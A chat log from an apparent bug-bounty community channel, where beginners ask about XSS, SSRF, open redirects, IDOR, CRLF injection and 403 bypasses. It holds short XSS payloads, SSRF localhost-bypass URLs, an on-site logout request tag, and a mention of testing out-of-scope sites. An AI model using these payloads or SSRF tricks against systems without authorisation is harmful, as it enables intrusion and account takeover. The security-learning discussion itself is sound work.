Couldn't find about bug bounty in start here

Hey you can read what channel is in channel topic :)

https://twitter.com/0x1trick/status/1500858009463017473?s=21

some bug hunters hunting MAGENTO-CVE-2022-24086 here?

K

Anyone wants to team up for a CTF ? https://ctf.intigriti.io/teams/invite?code=eyJpZCI6MjQzLCJ2IjoiZDhmZGI5NzY1ZDJkMjMwNWEzMGZjMjQxNzVhMWExODVjNDgzZTVjZiJ9.YieN2w.zDayB7GUsP2ifcwha7uPsIc2l3w

Hi , can anyone direct me to some premium labs to practice bug bounty?

Damn bounty hunting could be really excruciating. 3 dupes today lmao

I have found an IP on shodan related to a target, that returns this screen , upon looking with reverse DNS it points to some EC2 domain. Is there any apparent security issue with it? Any chance of EC2 domain takeover?

would it be okay if I post a link here for a platform that is currently being developed similar to bug bounty ?

Yes I think

You've tried the HTB labs

I'd leave that up to the mods^

google

Hi

Hi, while doing static analysis on an android apk via jadx, I have found google API key hardcoded in resources.arsc/strings.xml file. Is it a security issue? Can the key be used for malicious purpose?

Depends on what the key is used for, google utilise many and quite a few are useless

Hi guys

Please tell me

Tell you what?

Hi bro

India

Please don't call me bro. I don't understand how I can tell you "India".

Yes

And you

Does THM have a Bug Bounty program?

Yes.

!docs bug-bounty

TY

Gave +1 Rep to @abstract jolt

The Scope has to be confusing, lol, "Test our website, which is full of vulnerable machines, for any vulnerabilities" lol. JK I know you would have to be connected to the vpn to mess that up

Not the website?

I was joking...

can I do XSS with inline CSS injection in a div?

<div class="UserProfile" style="background-image: url('injection_here')">
</div>

limits: cloudflare WAF and " gets escaped to "

' doesn't

when the url is set to ');csshere I can injection CSS^

The parsing of CSS will most likely be sandboxed 🤔

By the browser

You mean something like this... ?"backgorund-image: url('https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpicfiles.alphacoders.com%2F265%2Fthumb-1920-26551.jpg&f=1&nofb=1'); width: auto; height: auto;"

no

thats CSS injection

I want to be able to execute code

you could set the BG image as your own "image" that just contains JS, can't you?

don't think so?

or idk what you mean

Inject the url as a real URL, but have the contents of the "Image" just be a js file

are you sure that would work?

I have no idea, but I think I saw something similar at some point haha

theres a website that has those things built in so you don't have to make a website

isn't that <script src=x.com>?

I think it could work if you have the <script> thing in the remote "image"

do you control the image?

I don't think that's how HTML works

you can't just inject HTML tags into CSS

You could do it with an SVG though

Link to an SVG that contains code

No idea if that would work with inline CSS 🤷‍♂️

Hey there folks

Any great free bug-bounty training program?

A great course

It would have to be an iframe

Tags like img don’t execute the code inside SVGs

I am having issues decompiling a .lua file, appears to have a "LuaQ" header, but unlua and luadec have not been able to decompile it 😦 (has issues with the chunks)

bad header in precompiled chunk
The input chunk reports an invalid code for lua number integrality: 4
Any ideas?

hello everyone
I'm dealing with the buffer overflow in windows 10
i find that I have to disable the DWORD value under HTTP from the registry
but I didn't find this value
is there any other solution?

Hey !
Can any one suggest me a good wordlist for fuzzing web directories. i'm using the following wordlist with ffuf:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt

Hey, yea I thought you were asking if you could pull off CSS injection, but after reading other answers, I got an idea...you can embed anything into a QR code (quickly with MSFT Edge), could you embed a link or something and the execution 'trigger' would be the scanning of the QR...

Thank you for sharing

Gave +1 Rep to @heavy anvil

Hey guys.
I'm new to cybersecurity

Suggest me a certification pathway/roadmap journey

Roadmap to my knowledge.
eJPT-->SEC+-->CEH--->eWPT

Any suggestions please?

Ceh only for India,
Ejpt doesn't really provide that much ,on INE you have the free course if you want to walk through it.
Sec+ is usually a go to cert,some people recommend you do net+ and A+ before so you have the foundation for sec+.
Also this isn't the channel for this go to #cyber-and-careers

Thank you Miccull.

Can you please suggest me the best resources to learn networking before I start Sec+?

Gave +1 Rep to @whole tide

Got a little bored and learned Rust. Made a pretty cool tool that'll grab url's off of web.archive.org and then filter through the list on what responses back from a basic html tag escape if anyone is interested
https://github.com/frostb1ten/PizzaHunt

I have been researching about cors on pre-auth pages, but can't find enough materials, anyone got any idea?? Or could point in the right direction? If it's actually worth researching for?

guys,
which path is for bug-bounty on THM?

THM doesn't have a dedicated Bug bounty path.

Probably best to look at the “How The Web Works” module and look at ZTH obscure web vulnerabilities 1 and 2

The nahamstore room is a good one for bug bounty

Longest I've spent on completing a room tbh

Wait until Osiris / Theseus...

Assuming medium rooms

Insane.

I know dum dum

I know

You English bad

It better than you

I gooder, you worser.

!docs bug-bounty

Can anyone tell me how to report for a information leakage vulnerability?

on TryHackMe?

No on other website

look for the website Bug-Bounty program, try emailing support and asking about where to email for bug-bounty, got to the /.well-known/security.txt.

Okay got it

Thank you 🙂

yo

bug bounty maniks

maniaks

anyone on hackerone?

How can i perform xss if "<" is blocked

hey guys

which tryhackme room/path is best to learn bug bounty

and how to peactice them before going to bug bounty platforms

?

If < and > is blocked, your last resort is atrribute injection

I can perform attribute injection only when the value goes into the attributes like value="what i enter"
But that's not the case the value which i enter simply goes into the body

Its actually a challenge in owasp vulnerable web application master
Xss level 5

answer to question two is on the tryhackme page. answer to question one depends on what you like to do, and maybe what you already know how to do

also I can't see the end of that str_replace call? does it also block >? does it block ";

i think depending on the browser you could also use maybe b64 encoded < ?

someone else will probably have a reason that i am incorrect

It only block "<" this character only

I will check for it let's see

I had a question

what's the use of APP_CENTER_SECRET?? I do know that it's used while building apps and it makes a call to the REST APIs, but does it possess a security risk?

I tried searching google for it, But I can't seem to understand it

From what I've found that key tends to be used more for sending telemetry data rather than holding any sort of auth purposes so doesn't pose much of a security risk

Hi everyone, I have a question
While doing a bug bounty, I found a CVE on a subdomain of the website, the subdomain is neither mentioned in In-Scope nor in Out-Of-Scope. For you information, the CVE is CVE-2021-26085.
Now I am confused, should I directly report the vuln or not...

I think you should report it .

@brisk shoal in that case you should be able to escape by using a value ending with "; for $user

well, you'd put your injection after the ";

which would execute as the next call after that echo

Oo yes

Didn't thought it like that

Yeah 🙏 thanks alot

np

I'd do a basic poc that shows something that you'd only find with this cve and report it

Besides from a small poc I'd recommend airing on the edge of caution until they response to the basic poc. Then if they request additional information to improve severity etc you can find what you need to flesh it out

Ok got it

Hello Friends

I have a challenging VM Box for which I need to get a Root. Anybody interested here please DM me. As I am stuck somewhere and need guidance. It would be a great learning for you as well as its not an easy box.

I need a complete POC

Hello everyone I have a question regarding open redirects
This example url is vulnerable to open redirect but condition is that URL need to start with "/"

https:www.some_website_.com/redirect.php?uri=/

We can bypass this by using "//"
now the url becomes

https:www.some_website_.com/redirect.php?uri=//www.google.com

Here I am redirecting to google.com

I want to know how "//" is able to bypass and redirected to google.com

/ is redirecting you to home page but // is redirecting you to another page, but regardless open redirect is often considered low to informative bug. While looking for open redirect, try to chain it with something else like XSS or CSRF, since there is a very low possibility you will be rewarded for only open redirect. This is because its low impact and also its a low hanging fruit which will be 99% duplicate.

How much time do you usually enumerate before finding a bug? I haven't really tried any programs yet because they all look like they've been tested 100 million times

Hey yall, I've been meaning to ask this for quite a bit... What's the most formal way to ask a company about their vulnerability payouts, even if they aren't apart of any bug bounty programs? I've found two CVEs, both ranked as critical 9.8s, but I'm not sure about how I should ask about their payouts, if they even have any.

@stray tapir Enumeration is actually a continuous process. Continuous enumeration of target daily. Or you can use automation.

My enumeration for bug-bounty is mostly finding weird places and hoping they are in scope, and then just mapping the places out (inputs mainly) and after I have a few candidates I try them out, so basically look for weird and obscure places and things (ie. uploading an image that gets embedded via a path and using it for xss or something).

Can you explain how // is redirecting to another page

Hi bug hunters! I need a little help with the bug I may have found. I runned a Burp scanner on the site and it found out "External service interaction (DNS), I confirmed with Burp Collaborator that it does DNS lookup of type A for domains. My question is: How can I further exploit it?

How can i use ' or 1=1# as username in hydra

Either you can put it in a file and act like it is a wordlist or you can use \ to escape the characters that cause problems.

Ok thanks

try ';alert(1)// or " onmouseover="alert(1);

any suggestions/tips heading to hackerone?

I was performing recon and i found one subdomain on visiting it gives endpoint not found , can there be a vulnerability for subdomain takeover

Great and beautiful explanation, this helped me 🙂 Thank you!

Gave +1 Rep to @uneven girder

Woaaaaaaaa

Hmmm

What is sub domain enumeration and why do we need to do? Thanks

First things first, do you know what a subdomain is?

TBH i dont

Ok, that should be your starting point

I googled and tha lang was too gard for me to understand

Things will become a lot clearer after understand that

Then you need to keep reading and researching

Alright thanks a lot sir

But can you explain me in simple terms what is sub domain and domain too if you dont mind?

I'm about to go and buy groceries, and this is definitely something you can read up about.
Hacking is all about research and learning.

Alright i appreciate your help

Hello, I wanted to start with Bug bounty.
Can I join with anyone who is ready to share his/her knowledge with live bug hunting, how to look,and everything. Any help is really appreciated. Thanks in advance 🙏🏻

Sub domain is the child of the domain it’s a part of a domain

Hello guys, I am new to bug hunting. However, I was working on one of the programs at bugcrowd.
Where I created two accounts on a website, and with a tweak of userid parameter in the url, I can access the password change page of another user.
I reported this as IDOR vulnerability, but the program owner discarded them saying , the password cannot be changed since you must know the password for changing it .
But isn't it a vulnerability ? Because you can access some other accounts password change page .

I need help in building up from here, like I have read blogs saying if you find an IDOR, try to make it into an xss, can anyone help me in how do I do that ?

You can chain idor with xss, so basically in this case, if you find a self xss, and an idor that will allow you to make changes to that particular page, you can add the self xss payload to the victim account through IDOR and when they open that particular page, it will fire up your payload

Or if you can find a way to bypass the password change functionality, you can also use the idor to change the victim's password

I'm able to inject bytes like 嘍嘊, which would decode to %E5%98%8D%E5%98%8A, into the location header

is it possible to pull off clrf injection / header injection?

webserver replies with location: https://xyz.com/img/.嘍嘊location: http://

^those are response headers

and yes, I can indeed do path traversal using /%2E%2E/%2E%2E/2E%2E%/2E%2E/

sucks that it's a redirect to storage.googleapis.com

Anyone here to help me out rooting a challenging box. I am stuck in rooting a box. There is a potential SSRF vulnerability and a jenkins instance running. Any assistance would be highly welcomed.

This doesn't sound like bug bounty

Can anyone help me with what exactly is the function of the client_secret api key? From what i have read is that it's used for authorization and basically acts as a password, so recently i encountered an api key having the name of
Google_api_client_secret while testing my university android app,
Can anyone explain what is its function? Caus i tried reading a bit about it on Google docs but could not understand it

Hi, a client API secret key is most of the time a key for authentication (not authorization) on an API endpoint. An API endpoint is like a service that is exposed to clients so it can do something particular, based on the request the client make.
Regarding your Android app, this secret key token may be used to authenticate and make requests to some Google APIs.

For example, this Google API (https://developers.google.com/adsense/host/v4.1/) can be used to interact with Google AdSense service. A client can then make HTTP calls (CRUD based / CREATE READ UPDATE DELETE) with the secret token to authenticate itself, and then ask for informations on related AdSense accounts on GET /accounts/account_id endpoint (the client providing the account_id value). Hope it helps 👍

I seee, thanks a lot...i get it now😊

Ur welcome :)

Yes this is not a bug bounty rather CTF style assignment

What is an attack called where an attacker can send typical CSRF GET requests from the destination site using e.g. img tags?

e.g. <img src="/ajax/logout">

I think OSRF iirc

on-site request forgery?

with this it'd be hard to show impact unless you could inject it in somewhere the user regularly sees, to cause a kinda DoS to the user

Yeah it's in the user profile pic

pretty much causes DoS

and teachers will be unable to launch tests because they will be logged out in the start menu of the test

sounds like a reasonable impact definitely

Yeahh I already reported that, the other day, just wanted to know what it was called

am currently trying to bypass mitigations because I'm able to upload any filetype to the url that the mitigation expects

what mitigations are in place?

a whitelist for /files/open/*md5hash*

uses regex and it's length sensitive, and it checks if the file exists

but no file extensions?

nope

well

when I upload a file it makes a new url using the hash (which I can use as a pfp)

and it does not check filetype upon using it as a profile picture

I see

try mess with the filename I guess, some null bytes maybe

but sounds reasonably secure

but you can upload html files no problem?

yeah

is the file rendered, or just downloaded

download

wait nvm rendered

also I forgot to say, the /files/open/md5hash endpoints redirect to storage.googleapi.com, with the corresponding hash

it's not saved on the site

I tried to inject clrf and null bytes into the file extension (which is not filtered), but without success

and storage.googleapi.com is not in CORS

oh it's stored using google?

damn

try a hash collision

I wonder what would happen

maybe would just say file already exists

you mean the SHAttered hash collision etc?

that's for the SHA-1 hashing algorithm though right

yeah

also, that can't happen because the hash involves a unix timestamp I think

because it changes every time I upload it

oh so it's not just a direct hash of the file

nope, sadly not

can you race it to see if you get the same hash in the same second

just to confirm your theory

sounds pretty secure

hm yeah

wouldn't be surprised if it involved a unique id as well (it increments by 1 each time I upload)

but I'll try it out

I've reported several critical bugs before for that company, so I wouldn't be surprised if there's a way

that's always a good sign I guess

a h1 target?

what are you hunting on these days

h1 private programs

decent

and just focusing on manual work?

yeah

I've scanned a bit with burpsuite pro as well, but most of the vulnerabilities are stored and show up on other places so bs scanning barely helped

it did confirm a certain vulnerability, which I didn't know how to confirm

what was that vuln?

Maybe try to leverage existing HTML syntax to make your own tags?

anyone got any good resources to demonstrate app testing on OSX?... I've found a really odd quality of life feature which I think could have some interesting exploitation angles if it doesn't sanitize input correctly.

Hello everyone It's regarding ssrf (Server Side Request Forgery)
can some tell how these url works normally Like I know that these payload are bypassing whitelisting but I want to know @,# and third highlighted case is working For example:
http://www.anydomain.com@localhost:1245
http://www.anydomain.com.localhost:1234
like http://www.anydomain.com itself sufficient adding .localhost:1234 or @localhost:1234 must will make url it invalid, like how above url is able to fetch content or it's working how it's redirecting to localhost:1234
For reference you can refer this :
https://portswigger.net/web-security/ssrf

I had a question

why does test+1@gmail.com amount to test@gmail.com sometimes?? and if the test@gmail.com is the account of the victim..how can this be leveraged?

Hey

Hey guys need your help .. any exploits I can use or tips for POC on Apache server version 2.4.6 . I have found it’s vulnerable but just need to show an exploit on doing this for POC .. any tips or help will be highly appreciate

https://people.cs.rutgers.edu/~watrous/plus-signs-in-email-addresses.html

Why do people get paid very well for XSS attacks?

Given that they are extremely common

Hi all, I have a question about SSRF. I have a payload that popped up on my interactsh client, but what's a good way to actually verify fully that it works? interactsh connections just don't seem like a good PoC to me, if it is then let me know.

a callback should be alright with the poc of how you got that callback

you might want to try and escalate severity though

See if any interesting headers are passed

Or if you can return the output from the request

looks like I'm getting a 15-30h a week software testing job at a 30 emp company in the vacation

am incredibly excited, don't know my wage yet as I will have another meeting with the folks who do the paperwork

Because they can be impactful.

Impactful in what way?

Do you understand XSS?
Having code execution in their browser means you can control everything they can see and everything they could click on

I am understanding XSS more and more

You could redefine links to link them to phishing sites, you could change account numbers that they're sending money to (if you had an XSS on that page)

And this is all assuming the app has HttpOnly on its session cookies otherwise you can just grab their cookie and takeover their session

How many years did it take you guys to be able to successfully bounty hunt?

literally less than 6 months

depends on how much time you spend on it and how good your background in tech is

You are the XSS Bug-Bounty type person haha

perhaps

in the past few months I've been searching for more complex bugs such as race conditions, auth issues, etc

Right, so I have a question. I'm able to get an endpoint to make a GET request to a user-defined domain, when it shouldn't be. What can I actually do with this information? Can I get the target to download a file somehow? RCE somehow? I honestly have never encountered this behaviour.

Use collaborator and check if you get an HTTP request and a DNS request. Then it is SSRF!

Maybe u could escalate it to XSS or RCE.. Try it out

In source code, i found an ip which is leading to an exposed docker container, i am able to list the version , but there are no docker images present in that when i tried to view the image , so is it worth reporting? Or is it an expected behavior

I'm using interactsh, but yeah same diff. It's definitely ssrf, but I'm trying to see if I can somehow host something on a domain that could lead to rce.

My main problem is that the input is an email field, so it'd have to be on the root domain only (ie, no url.com/file.sh, or anything like that)

Sorry i am unaware about rce part. Btw have you tried AWS metadata leakage through ssrf?

This could help you in getting security credentials (in some case temporary credentials). So you could use that to query the AWS metadata instance through SSRF.

Is it a DNS lookup?

or a HTTP request etc.

@wise skiff He said it's a GET request.. so HTTP. And if has managed to do this, it's surely an SSRF. DNS lookup is also a part of SSRF but HTTP request is the main confirmation for SSRF

it may well be SSRF

could be tricky to prove impact/severity though

I agree. Some ways would be escalate it to an XSS or AWS metadata leakage.. What else would you recommend?

well if he can only get the root of the website

maybe see if it follows redirects

that's probably his best bet

or see if any headers are passed

Hi gus

Guys*

I need one help regarding api testing

@mighty wigeon @wise skiff That's my question, I'm not sure what my options are as to escalating. I'll definitely give the redirect thing a go though

And no, there's no abnormal headers in the request

shoot

Tried internal port scans yet?

Update us on the situation as well. It's great discussing about this and ur bug hunting process

what's the user agent

or was that header not sent

alr i might have asked this question before but how as a teen could i use hackerone for bug bounty

I think there is an age restriction on it. IIRC.

Lol, NVM.

It's 13.

yeah, so would there be any liability papers or something

or like, payment wise

I'm unsure about that, sorry.

Hello everybody, i am aoxsin.

Hi

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

Which is... not current

huh, that's a weird user agent definitely

especially for a bot to visit that

how did the redirect go?

Haven't tried yet, I will now, but how can I set up something that would redirect where I can still capture the actual request?

I’d just set up a flask server on a VPS that points to something like requestbin

and just see if the requestbin gets hit

The other day i reported my first bug and i got paid 200 USD :)))

Wow thats incredible, what did you report?

https://giphy.com/gifs/studiosoriginals-3oz8xRF0v9WMAUVLNK

XSS

They are a webdev company

And the bug is in the template they use for most of the websites they create

so i went to the portfolio of this company and made a script that checked how many of these websites were affected by the same exact payload

and it was over 100

@peak vapor I'm a manager for a webdev shop, I'd love to hear more about what you found & how ... I'm actually paying out my first bug bounty to another independent researcher for finding something unreleated to the web haha 😛 ... DM me sometime if you wanna chat about it 👍

thanks!

Gave +1 Rep to @lapis horizon

I hope those additional sites were in scope

👉 👈

No, but they didn't get mad about it 🙂

Congrats @peak vapor

Was it through a bug bounty platform

Or an individual disclosure

can anyone suggest me how can bypass 403 (forbidden) to see directory content.
Ping me if replying .

individual disclosure

Try using gobuster:

gobuster -w=/usr/share/wordlists/dirb/big.txt -u http://<host>/<403_directory/ 

Hi all, need a piece of advice. What would you suggest to automate the "technology lookup/built-with" part of a recon for a large scope of domains. Sadly the free API option of built with doesn't offer info on subdomains so it's useless unless paid.

Hello everyone, will someone collaborate with me in finding my first bug?

Hey I have a question for anyone knowledgeable, I think I stumbled onto a bug on a website I was visiting. You could use a password with or without a symbol at the end to log into the same account, I'm assuming this is bad, correct?

yes

there’s some weird normalisation going on

can you create an account with a symbol on the end

Username with symbol or a password? I have no symbol on the back end of the current account but adding a symbol will still log me into the account. I'm thinking of reporting it but I want to be able to tell the succinctly what's going on, and I'm still new to this.

so

if you create two accounts say test and test$ (or whatever symbols work in this instance)

with different passwords

can you log into test with the password of test$

if that makes sense

It's definitely worth reporting regardless though, sounds funky

I know that it would def make a dictionary attack much easier, I'm going to report it, but I was trying to leverage some $$$

It would look great on a cyber resume 😛

yeah definitely

what special characters does it ignore

I know ' ! ' for sure

okay, try enumerate more I'd say

Ok I've tried '! @ #' at the end of the test pass on the new account and they are all accepted. How could this be exploited, I know using cupp.py to create custom wordlists and username lists could benefit, is there anything else I'm missing, I am reporting now.

@wise skiff

erm

did you try the account thing I mentioned previously

to check if you can access a *different account

if you can

that'd escalate it to full account takeover, which is normally a high/critical bug

Friendly tip:While doing this^ try only using accounts created by you

Yeah, don't ever attack accounts that don't belong to you

If you can't create more than one account, contact the site operators, tell them about the bug, and ask for a second one to prove it

admin&
:v

Well I assume if it strips symbols first then it should be querying DB for the hash of actual 'user' and not 'user' . [symbol] ... I can't think off the top of my head of how it would do otherwise but I'm sure this is still a should

I wrote about it as much I know, you can read it here
https://github.com/KathanP19/HowToHunt/blob/master/Status_Code_Bypass/403Bypass.md

and here is the POC video
https://youtu.be/J30KmyQetO0

hey guys just a question on windows 10 would this be a bug Worth investigating

This doesn't seem overly related to bug bounty. Is this your video?

They posted that in a few channels, I know it's #963448752151101570

I did mean to tag you, but I didn't press enter.

403 Forbidden
Microsoft-Azure-Application-Gateway/v2 i m at this page anyone know the wordlist so that i can fuzz it further

hi guys, i am a beginner and i want to start bug bounty. To identify minor bugs and earn minor amounts, which skillsets do i need to have? And which rooms do you recommend to? Any recommendation is appreciated 🙂

thank you 🙂

Gave +1 Rep to @lapis horizon

while i was trying to send a curl request to a few IP addresses, iam getting this <script> if(console && console.log) { console.log("host.value.ip.address"); console.log("Unable to resolve tenant with host value as IP."); } </script>

any idea what does it means

hacking?

??

??

Can anyone suggest some good crawling tools?? I use gau, wayback... Would really love some other suggestions.. Specially if they are able to find parameters

There are some really good courses on Udemy you could pick up on a sale

@fallen palm Thank you, i will go after it. Do you have any suggestions?

Gave +1 Rep to @twin heath

I can't post a screenshot here but there's one that's near the five star range with nearly 15k reviews that I'm going to get when it's on sale. Scroll thru them and see what interests you.

Thank you :)

I saw one fitting your description and it was on sale for 11 more hours

Oh wow. Yep. $130 on sale for $20. BOUGHT.

How does prototype pollution happen in practice?

^which can't just be escalated to XSS

because the only way I can imagine it happening is eval(), but iirc you can just turn it into XSS at that point

Is Count.cgi vulnerable still?

I mean it depends on which side you're polluting,because you wouldn't do an xss on server side.
But in general it happens when an object is improperly/insecurely merged into another object (when it copies over prototype properties when it shouldn't)

And depending on the code that then used the object, it can have different outcomes

You could do prototype pollution in something like vue to pollute a template/component and that could result in xss

But you also could pollute the default object with a property that is not present normally in settings for another portion of the code and trigger unwanted behaviour

Hi all. Beginner here, struggling to identify potential targets. I use Intigriti (so as to not have huge competition from the main bugcrowd and hack1, etc).
I primarily know about IDOR, XXS, SQLi. and know next to nothing about mobile, so of course I've been going for web apps.
My issue is, at a glance and after initial recon of subdomains with live http requests and checking out various input fields using burp, I can't seem to identify which targets are more robust and which might be more beginner friendly.

is there some up to date cheat-sheet I can use to test for waf bypasses or for known vulnerable parameters and such?
essentially, I'd like to write-off targets that may be too difficult for someone at a more beginner level

intigriti isn't as small as you think 😄, it's pretty big in europe

i guess payloadsallthethings contains a bunch of starter things you can iterate on

yes I am based in the uk, another reason to go for that one. Are the smaller platforms worth taking a look at first? if so, could you recommend any? Thanks for the resource recommendation too

Gave +1 Rep to @thorn parcel

not sure if it's worth trying to try and look for smaller platforms, maybe someone else here has another opinion on that but i'd think that the amount of people - even when it does mean bigger potential competition - doesn't always mean that you will actually have that many competitors on a program, especially if you dig into it and don't stop at low hanging fruit

ok cool, that's good to know

Can any one suggest how to learn to write XSS payload ?
find very difficult to solve xss challenge lab